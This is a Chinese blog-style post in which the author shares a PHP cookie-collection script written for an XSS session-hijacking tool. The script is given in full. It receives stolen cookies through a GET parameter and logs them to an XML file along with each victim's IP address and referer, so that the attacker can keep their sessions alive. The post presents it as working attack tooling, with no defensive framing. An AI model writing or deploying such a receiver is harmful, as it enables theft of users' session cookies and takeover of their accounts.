我寫的這個純粹是好玩,沒啥意思,說到底就是操作xml而已。緣起還是歸結於前幾天http://www.cncert.net在 我們的郵件列表發布了一個新的xss利用工具,類似老外的hamster,在客戶端定時刷新保持session不超時。被跨站的人只要訪問一次之後,攻擊 者就可以一直保持登陸的狀態。他這個工具用.net做的,為了方便,要求收集cookie的腳本把cookie保存為xml文件。他提供了一個asp程 序,我只有php空間,因此寫了個php的作測試用。
代碼:
<?php
date_default_timezone_set("Asia/Chongqing");
$my_file = "cookie.xml";
if( ! isset( $_GET[x] ) )
{
exit;
}
$my_cookie = $_GET[x];
if( $_GET[x] != "" )
{
if( ! file_exists( $my_file ) )
{
CreateXmlFile( );
}
AddData( $my_cookie );
}
function CreateXmlFile( )
{
global $my_file;
$fp = fopen( $my_file, "wb" );
if( ! $fp )
{
exit;
}
fwrite( $fp, "<?xml version="1.0" encoding="gb2312" ?>
" );
fwrite( $fp, "<rss version="2.0">
" );
fwrite( $fp, "<treeroot>
" );
fwrite( $fp, "</treeroot>
" );
fwrite( $fp, "</rss>" );
fclose( $fp );
}
function AddData( $my_cookie )
{
global $my_file;
$doc = new DOMDocument( );
$doc->load( $my_file );
$doc->formatOutput = true;
$treeroot = $doc->getElementsBytagName( "treeroot" )->item(0);
$item = $doc->createElement( "item" );
$treeroot->appendChild( $item );
if( isset( $_SERVER["REMOTE_HOST"] ) )
{
$remote_host = $_SERVER["REMOTE_HOST"];
}
elseif( isset( $_SERVER["REMOTE_ADDR"] ) )
{
$remote_host = $_SERVER["REMOTE_ADDR"];
}
else
{
$remote_host = "NotCare";
}
$title = $doc->createElement( "title", $remote_host );
$item->appendChild( $title );
if( isset( $_SERVER["HTTP_REFERER"] ) )
{
$refer = $_SERVER["HTTP_REFERER"];
}
else
{
$refer = "http://yahoo.cn";
}
$link = $doc->createElement( "link", $refer );
$item->appendChild( $link );
$src_ip = $doc->createElement( "src_ip", $_SERVER["REMOTE_ADDR"] );
$item->appendChild( $src_ip );
$src_os = $doc->createElement( "src_os", "NotCare" );
$item->appendChild( $src_os );
$pubDate = $doc->createElement( "pubDate", date( "r" ) );
$item->appendChild( $pubDate );
$description = $doc->createElement( "description", $my_cookie );
$item->appendChild( $description );
$doc->save( $my_file );
}
?>
